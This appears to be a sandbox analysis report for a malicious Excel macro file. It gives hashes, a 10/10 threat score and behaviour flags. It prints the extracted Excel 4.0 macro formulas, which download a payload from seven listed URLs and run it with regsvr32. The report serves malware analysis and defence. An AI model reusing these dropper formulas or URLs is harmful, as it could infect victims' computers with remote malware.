Overview

overview

10

Static

static

10

68edd36ea1...d.xlsm

windows7-x64

10

68edd36ea1...d.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    68edd36ea14f7aab1932e9aba9ed4af9b0ea22a68cfbf12f3ed88f1fbb8ff27d

  • Size

    35KB

  • Sample

    241120-ns6m4a1kak

  • MD5

    ff4c2f9273d5f3b6312818127a27bac0

  • SHA1

    c45dfb83aabf5eaabf6faa3f69b8e53c3f82b394

  • SHA256

    68edd36ea14f7aab1932e9aba9ed4af9b0ea22a68cfbf12f3ed88f1fbb8ff27d

  • SHA512

    48c19658cf02d664fdf618b2c352ca6f310aaacdf340b93f9c13295c3360b02cf97ce66a0d66fcd6a4f0b614f549b2b7f2bc7dce8205e1e0e383a92f38277fa3

  • SSDEEP

    768:yFtT5eBvAjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooo0+6:CtTghUOZZ1ZYpoQ/pMAz

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://freebingpops.com/cgi-bin/DmVp7VBVEpHssN/

https://www.kinfri.com/licenses/3fKSJkZXZ3JH6dXWU/

https://globaltextiles.net/cgi-bin/7naWzYGRrrN/

https://cartoriogasparin.com.br/rosesq/gOfN6jvyRme/

https://junhe.media/wp-includes/VV2NZX242BnWCtYmV9N/

https://ibpcorp.org/wp-admin/zH1k6hEcWGHLDp/

https://ihmsswiss.ch/wp-admin/gUOq0e/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freebingpops.com/cgi-bin/DmVp7VBVEpHssN/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.kinfri.com/licenses/3fKSJkZXZ3JH6dXWU/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://globaltextiles.net/cgi-bin/7naWzYGRrrN/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://cartoriogasparin.com.br/rosesq/gOfN6jvyRme/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://junhe.media/wp-includes/VV2NZX242BnWCtYmV9N/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ibpcorp.org/wp-admin/zH1k6hEcWGHLDp/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ihmsswiss.ch/wp-admin/gUOq0e/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://freebingpops.com/cgi-bin/DmVp7VBVEpHssN/
xlm40.dropper

https://www.kinfri.com/licenses/3fKSJkZXZ3JH6dXWU/
xlm40.dropper

https://globaltextiles.net/cgi-bin/7naWzYGRrrN/
xlm40.dropper

https://cartoriogasparin.com.br/rosesq/gOfN6jvyRme/

Targets

    • Target

      68edd36ea14f7aab1932e9aba9ed4af9b0ea22a68cfbf12f3ed88f1fbb8ff27d

    • Size

      35KB

    • MD5

      ff4c2f9273d5f3b6312818127a27bac0

    • SHA1

      c45dfb83aabf5eaabf6faa3f69b8e53c3f82b394

    • SHA256

      68edd36ea14f7aab1932e9aba9ed4af9b0ea22a68cfbf12f3ed88f1fbb8ff27d

    • SHA512

      48c19658cf02d664fdf618b2c352ca6f310aaacdf340b93f9c13295c3360b02cf97ce66a0d66fcd6a4f0b614f549b2b7f2bc7dce8205e1e0e383a92f38277fa3

    • SSDEEP

      768:yFtT5eBvAjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooo0+6:CtTghUOZZ1ZYpoQ/pMAz

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks